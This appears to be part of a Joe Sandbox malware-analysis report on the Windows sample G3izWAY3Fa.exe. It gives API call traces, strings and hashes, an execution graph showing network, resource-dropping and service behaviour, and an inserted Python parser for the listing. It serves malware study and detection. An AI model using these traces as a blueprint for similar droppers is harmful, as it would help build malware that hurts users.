                                • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-297319885
                                • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                • String ID:
                                • API String ID: 2987980305-0
                                • Opcode ID: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                • Opcode Fuzzy Hash: 9b564887ea250fec720acf1d14385518bd2ff36926a3d3c154242c6b74caae1f
                                • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                APIs
                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                • lstrlenA.KERNEL32(0040A350,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                • RegSetValueExA.ADVAPI32(?,?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                • RegCloseKey.ADVAPI32(?,?,?,0040A350,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                Similarity
                                • API ID: CloseCreateValuelstrlen
                                • String ID:
                                • API String ID: 1356686001-0
                                • Opcode ID: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                • Opcode Fuzzy Hash: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                APIs
                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                • String ID:
                                • API String ID: 1404258612-0
                                • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                APIs
                                • GetDC.USER32(?), ref: 00401D22
                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirect
                                • String ID:
                                • API String ID: 3272661963-0
                                • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                APIs
                                • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                • GetTickCount.KERNEL32 ref: 00402BEF
                                • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                APIs
                                • SetWindowTextA.USER32(00000000,00423680), ref: 00403887
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: TextWindow
                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 530164218-3283962145
                                • Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                • Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00404D01
                                • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D6F
                                  • Part of subcall function 00403DDB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403DED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                • WriteFile.KERNEL32(00000000,?,open C:\Windows\temp\Edit9,00000000,?,?,00000000,00000011), ref: 004024FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileWritelstrlen
                                • String ID: open C:\Windows\temp\Edit9
                                • API String ID: 427699356-1012079565
                                • Opcode ID: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                • Opcode Fuzzy Hash: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                APIs
                                • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                • GlobalFree.KERNEL32(?), ref: 004034B2
                                Strings
                                • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004034A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"
                                • API String ID: 1100898210-3663855964
                                • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                APIs
                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040551D
                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040552B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-2743851969
                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                APIs
                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405649
                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF
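Added example, not part of the Joe Sandbox report and not code from the sample: a Python parser for the IDA-plugin function listing above. Each "APIs" block is turned into structured call records; the string values the sandbox captured on the stack at a call are kept (the `open C:\Windows\temp\Edit9` text next to the WriteFile at 004024FB, the quoted sample path next to FreeLibrary at 004034AB), and blocks are tagged by API family so the interesting functions can be pulled out of a long listing. The embedded listing is a trimmed copy of three of this page's own blocks with the repeated "Associated" dump lines removed; the category table is an assumption chosen for the demonstration, not a Joe Sandbox classification.

```python
import re

# Constructed excerpt in the format of the IDA-plugin listing above: three of
# the report's own blocks, with the repeated "Associated" dump lines trimmed.
SAMPLE_LISTING = r"""
APIs
• GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
• GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
• VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
Memory Dump Source
• Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
• String ID:
• API String ID: 1404258612-0
• Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
APIs
• lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
• WriteFile.KERNEL32(00000000,?,open C:\Windows\temp\Edit9,00000000,?,?,00000000,00000011), ref: 004024FB
Strings
Similarity
• API ID: FileWritelstrlen
• String ID: open C:\Windows\temp\Edit9
• API String ID: 427699356-1012079565
APIs
• FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
• GlobalFree.KERNEL32(?), ref: 004034B2
Strings
• "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004034A3
Similarity
• API ID: Free$GlobalLibrary
• String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"
• API String ID: 1100898210-3663855964
"""

# One API call line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(stack args)", then "ref: <call site>".
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
FIELD = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEX_IMM = re.compile(r"^[0-9A-F]{8}$")

def parse_function_blocks(listing):
    """Split the listing at each 'APIs' header; collect calls, strings and similarity fields."""
    blocks, cur = [], None
    for raw in listing.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "strings": [], "fields": {}}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            cur["calls"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"), "subcall_of": m.group("sub"),
            })
            continue
        f = FIELD.match(line)
        if f:
            key, val = f.group("key"), f.group("val").strip()
            if key == "String ID":          # '$'-separated list of strings referenced by the function
                cur["strings"] = [s for s in val.split("$") if s]
            else:
                cur["fields"][key] = val
    return blocks

def literal_args(call):
    """Stack arguments that are neither an 8-digit hex immediate nor the unknown marker '?'."""
    return [a for a in call["args"] if a and a != "?" and not HEX_IMM.match(a)]

# Assumed grouping for the demonstration, not the sandbox's own taxonomy.
CATEGORIES = {
    "file write": {"WriteFile"},
    "version probing": {"GetFileVersionInfoSizeA", "GetFileVersionInfoA", "VerQueryValueA"},
    "library unload": {"FreeLibrary"},
}

def summarise_block(block):
    names = {c["name"] for c in block["calls"]}
    return {
        "apis": sorted(names),
        "categories": sorted(k for k, v in CATEGORIES.items() if names & v),
        "literals": [a for c in block["calls"] for a in literal_args(c)],
        "strings": block["strings"],
        "fuzzy": block["fields"].get("Instruction Fuzzy Hash"),
    }

def find_calls_with_literal(blocks, api_name):
    """(call site, literals) for every call to api_name whose captured stack carries non-numeric data."""
    return [(c["ref"], literal_args(c))
            for b in blocks for c in b["calls"]
            if c["name"] == api_name and literal_args(c)]

if __name__ == "__main__":
    blocks = parse_function_blocks(SAMPLE_LISTING)
    for i, b in enumerate(blocks):
        print(i, summarise_block(b))
    print(find_calls_with_literal(blocks, "WriteFile"))
```

The literal next to the WriteFile call is the useful artefact here: the sandbox only shows it among the stack values captured at the call site, so the parser keeps it rather than collapsing every argument to a number. Run over the full listing, the same filter surfaces the `[Rename]`, `C:\Users\user\Desktop` and `1033$C:\Users\user\AppData\Local\Temp\` values seen in the other blocks above.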

                                Execution Graph

                                Execution Coverage:7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:14.8%
                                Total number of Nodes:610
                                Total number of Limit Nodes:2
                                execution_graph 1420 405182 WSAStartup 1421 4051a6 Sleep 1420->1421 1425 40507d time localtime wsprintfA 1421->1425 1423 4051b4 atoi 1423->1421 1424 4051cc Sleep CreateThread 1423->1424 1426 4050ca WSAStartup 1424->1426 1425->1423 1427 4050e3 CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1426->1427 1427->1427 1436 405244 LoadLibraryA 6CFC6DE0 FindResourceA 1437 405284 LoadResource 1436->1437 1438 40532c 1436->1438 1437->1438 1440 40529f 1437->1440 1440->1438 1441 4052a8 LockResource 1440->1441 1441->1438 1442 4052b5 wsprintfA 1441->1442 1443 4052e6 1442->1443 1443->1438 1444 4052ed WriteFile SetFilePointer lstrlen WriteFile CloseHandle 1443->1444 1444->1438 1445 4027e4 1447 4027ed 1445->1447 1446 402967 realloc 1448 40281c 1446->1448 1447->1446 1447->1448 1355 406a48 __set_app_type __p__fmode __p__commode 1356 406ab7 1355->1356 1357 406acb 1356->1357 1358 406abf __setusermatherr 1356->1358 1367 406bb2 _controlfp 1357->1367 1358->1357 1360 406ad0 _initterm __getmainargs _initterm 1361 406b24 GetStartupInfoA 1360->1361 1363 406b58 GetModuleHandleA 1361->1363 1368 40597d WSAStartup 1363->1368 1367->1360 1379 4059f4 LoadLibraryA 6CFC6DE0 _mbscpy _mbscat RegOpenKeyExA 1368->1379 1371 4059a1 StartServiceCtrlDispatcherA 1373 4059c1 exit _XcptFilter 